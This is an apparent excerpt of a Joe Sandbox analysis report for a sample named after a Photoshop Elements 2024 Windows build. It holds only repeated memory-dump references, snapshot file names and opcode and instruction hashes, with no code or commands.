                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3769317097.000000000A770000.00000010.00000800.00020000.00000000.sdmp, Offset: 0A770000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_a770000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction ID: 14818e3e9487a0c9bd497ae2e45743b740c1a34d3ba33339ce9637b9a354f560
                                                                                                        • Opcode Fuzzy Hash: 4f2b14b35c2823e85ecf8a485c86922c145ff9d6e8e4f1b1e478e6e74dc4b8a2
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000A.00000002.3775358970.000000000C470000.00000010.00000800.00020000.00000000.sdmp, Offset: 0C470000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_10_2_c470000_PhotoshopElements_2024_LS30_win64.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction ID: e5e3e4bbb8fe065a85d2e0d64d5bfdc80809524daf260fb3ea16344e04886990
                                                                                                        • Opcode Fuzzy Hash: 43e9e456df4894401c15b478709a7668ca80bf393c9555a5f4939e34f563db62
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        Memory Dump Source
